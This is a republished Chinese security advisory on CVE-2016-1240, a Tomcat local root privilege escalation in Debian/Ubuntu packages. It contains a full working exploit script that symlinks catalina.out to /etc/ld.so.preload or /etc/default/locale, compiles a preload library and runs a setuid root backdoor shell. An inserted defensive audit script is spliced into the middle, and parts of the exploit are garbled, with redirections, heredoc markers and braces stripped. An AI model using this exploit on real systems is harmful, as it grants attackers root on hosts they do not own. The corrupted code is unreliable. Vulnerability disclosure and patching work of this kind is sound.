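Debian/Ubuntu root privileges at risk: Tomcat local privilege escalation vulnerability CVE-2016-1240. Security operations teams should upgrade as soon as possible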

Time: 2023-09-27 14:24:06

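On September 30, 2016, legalhackers.com published an advisory about a Tomcat vulnerability, identified as CVE-2016-1240. Administrators of Debian-based Linux systems usually manage packages with apt-get. An init script in the Debian packages contains the vulnerability: the deb package installer runs the startup script automatically, and the script is located at /etc/init.d/tomcatN.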

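An attacker who already holds the low-privileged Tomcat account can use this vulnerability to obtain root on the system. Affected systems include Debian and Ubuntu; other systems that use the Debian packages may also be affected.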

For details, see the following links:

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
https://security-tracker.debian.org/tracker/CVE-2016-1240

CVE-2016-4438

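Affected versions

Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected. The affected Debian packages are:

Tomcat 8 = 8.0.36-2
Tomcat 7 = 7.0.70-2
Tomcat 6 = 6.0.45+dfsg-1~deb8u1

What is Tomcat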

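Tomcat is an application server that runs on Apache, a container that supports running Servlet/JSP applications. Tomcat can be thought of as an extension of Apache, although in practice it can also run independently of Apache.

Tomcat is a Servlet container developed by the Jakarta project under the Apache Software Foundation. It implements support for Servlets and JavaServer Pages (JSP) according to the technical specifications provided by Sun Microsystems, and offers some features specific to its role as a web server, such as the Tomcat management and control platform, security realm management, and Tomcat valves. Because Tomcat also contains an HTTP server of its own, it can be regarded as a standalone web server.

What is Debian

In the broad sense, Debian refers to a cooperative organization dedicated to creating a free operating system, and to its works. Because Linux is the main one among the Debian project's many kernel branches, and most of the basic tools in the operating system built by Debian developers come from the GNU project, "Debian" usually refers to Debian GNU/Linux.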

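The Tomcat security team has fixed the affected packages. Users are advised to upgrade to the latest version; the new versions can be downloaded from:

https://sources.debian.net/src/tomcat6/
https://sources.debian.net/src/tomcat7/
https://sources.debian.net/src/tomcat8/

Brief analysis of the Tomcat root privilege escalation vulnerability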

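A local attacker acting as the tomcat user (for example, through a vulnerability in a web application) can replace catalina.out with a link to an arbitrary system file. Once the Tomcat init script (which runs as root) reopens catalina.out after a service restart, the attacker can obtain root privileges. The relevant part of the init script: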

# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
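
A defensive companion to the init-script snippet above, added here as an example and not taken from the advisory or the Debian package: `prepare_log` is a hypothetical replacement for the touch/chown pair that refuses symlinks, and `audit_tomcat_log` (also hypothetical) flags a symlinked catalina.out or a non-root owner on /etc/ld.so.preload and /etc/default/locale. The log path in the usage comment is an assumption.

```shell
#!/bin/sh
# Added example (not from the advisory or the Debian package).
# Default paths are the two files named in the PoC; pass others to test.

# Hardened counterpart of the init script's touch+chown. Refuses to act
# when the log is a symlink and uses chown -h, which never follows links.
# Assumption: the caller passes the service account as a uid or name.
prepare_log() {
    log=$1; user=$2
    if [ -L "$log" ]; then
        echo "refusing: $log is a symlink to $(readlink "$log")" >&2
        return 1
    fi
    if [ -e "$log" ] && [ ! -f "$log" ]; then
        echo "refusing: $log is not a regular file" >&2
        return 1
    fi
    [ -e "$log" ] || : > "$log"
    chown -h "$user" "$log"
}

# Audit: report a symlinked catalina.out and any non-root owner on the
# files the log could have been pointed at. Returns 1 on any finding.
audit_tomcat_log() {
    log=$1; preload=${2:-/etc/ld.so.preload}; locale=${3:-/etc/default/locale}
    rc=0
    if [ -L "$log" ]; then
        echo "FINDING: $log is a symlink to $(readlink "$log")"
        rc=1
    fi
    for f in "$preload" "$locale"; do
        [ -e "$f" ] || continue
        uid=$(stat -c %u "$f")    # GNU stat, as shipped on Debian/Ubuntu
        if [ "$uid" != 0 ]; then
            echo "FINDING: $f is owned by uid $uid, expected 0"
            rc=1
        fi
    done
    return $rc
}

# Usage: sh audit.sh /var/lib/tomcat7/logs/catalina.out  (example path)
if [ $# -gt 0 ]; then audit_tomcat_log "$@"; fi
```

The symlink check in `prepare_log` is still a check-then-act sequence, so it narrows the window but does not close it while the log directory is writable by the tomcat account; upgrading the package remains the fix, and the audit is useful for spotting hosts where the condition already exists.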

Tomcat root privilege escalation proof-of-concept

------[ tomcat-rootprivesc-deb.sh ]------

#!/bin/bash 

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit 

# CVE-2016-1240 

# Discovered and coded by: 

# Dawid Golunski 
# http://legalhackers.com 

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc. 
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root. 

# Usage: 
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 

# The exploit can used in two ways: 

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly 
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up 
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) 

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can 
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations). 

# See full advisory for details at: 
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html 

# Disclaimer: 
# For testing purposes only. Do no harm. 
#

BACKDOORSH="/bin/bash" 
BACKDOORPATH="/tmp/tomcatrootsh" 
PRIVESCLIB="/tmp/privesclib.so" 
PRIVESCSRC="/tmp/privesclib.c" 
SUIDBIN="/usr/bin/sudo"

function cleanexit { 
# Cleanup 
echo -e "\n[+] Cleaning up..." 
rm -f $PRIVESCSRC 
rm -f $PRIVESCLIB 
rm -f $TOMCATLOG 
touch $TOMCATLOG 
if [ -f /etc/ld.so.preload ]; then 
echo -n /etc/ld.so.preload 2 /dev/null 
fi 
echo -e "\n[+] Job done. Exiting with code $1 \n" 
exit $1 
}

function ctrl_c() { 
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." 
cleanexit 0 
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" 
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args 
if [ $# -lt 1 ]; then 
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" 
exit 3 
fi 
if [ "$2" = "-deferred" ]; then 
mode="deferred" 
else 
mode="active" 
fi

# Priv check 
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" 
id | grep -q tomcat 
if [ $? -ne 0 ]; then 
echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" 
exit 3 
fi

# Set target paths 
TOMCATLOG="$1" 
if [ ! -f $TOMCATLOG ]; then 
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesnt exist. Try again.\n" 
exit 3 
fi 
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default 
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. 
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been 
# restarted and file owner gets changed. 
if [ "$mode" = "deferred" ]; then 
rm -f $TOMCATLOG ln -s /etc/default/locale $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldnt remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" 
echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" 
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" 
echo -ne "\n    youll be able to add arbitrary commands to the file which will get executed with root privileges" 
echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you cant wait ;)\n\n" 
exit 0 
fi

# [ Active exploitation ]

trap ctrl_c INT 
# Compile privesc preload library 
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" 
cat _solibeof_ $PRIVESCSRC 
#define _GNU_SOURCE 
#include stdio.h  
#include sys/stat.h  
#include unistd.h  
#include dlfcn.h  
uid_t geteuid(void) { 
static uid_t  (*old_geteuid)(); 
old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 
if ( old_geteuid() == 0 ) { 
chown("$BACKDOORPATH", 0, 0); 
chmod("$BACKDOORPATH", 04777); 
unlink("/etc/ld.so.preload"); 

return old_geteuid(); 

_solibeof_ 
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." 
cleanexit 2; 
fi

# Prepare backdoor shell 
cp $BACKDOORSH $BACKDOORPATH 
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check 
if [ -f /etc/ld.so.preload ]; then 
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." 
cleanexit 2 
fi

# Symlink the log file to ld.so.preload 
rm -f $TOMCATLOG ln -s /etc/ld.so.preload $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldnt remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs 
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." 
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" 
while :; do 
sleep 0.1 
if [ -f /etc/ld.so.preload ]; then 
echo $PRIVESCLIB /etc/ld.so.preload 
break; 
fi 
done

# /etc/ld.so.preload file should be owned by tomcat user at this point 
# Inject the privesc.so shared library to escalate privileges 
echo $PRIVESCLIB /etc/ld.so.preload 
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" 
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" 
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) 
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" 
sudo --help 2 /dev/null /dev/null

# Check for the rootshell 
ls -l $BACKDOORPATH | grep rws | grep -q root 
if [ $? -eq 0 ]; then 
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" 
echo -e "\n\033[94mPlease tell me youre seeing this too ;) \033[0m" 
else 
echo -e "\n[!] Failed to get root" 
cleanexit 2 
fi

# Execute the rootshell 
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" 
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" 
$BACKDOORPATH -p

# Job done. 
cleanexit 0

--------------[ EOF ]-------------------- 

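NSFOCUS statement

This security advisory is intended only to describe possible security issues; NSFOCUS provides no guarantee or commitment regarding it. Any direct or indirect consequences and losses caused by disseminating or using the information in this advisory are the sole responsibility of the user, and neither NSFOCUS nor the author of the advisory accepts any liability for them. NSFOCUS reserves the right to modify and interpret this advisory. Anyone reprinting or distributing this advisory must preserve it in full, including the copyright statement. Without permission from NSFOCUS, the content of this advisory may not be modified, added to or cut, and may not be used for commercial purposes in any way.

Original publication date: March 24, 2017

Published by NSFOCUS (绿盟科技); copyright belongs to the original author

Original link: http://toutiao.secjia.com/tomcat-root-privilege-escalation-exploit-cve-2016-1240

This article comes from Anquanjia (安全加), a partner of the Yunqi Community; for related information, follow the Anquanjia website.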
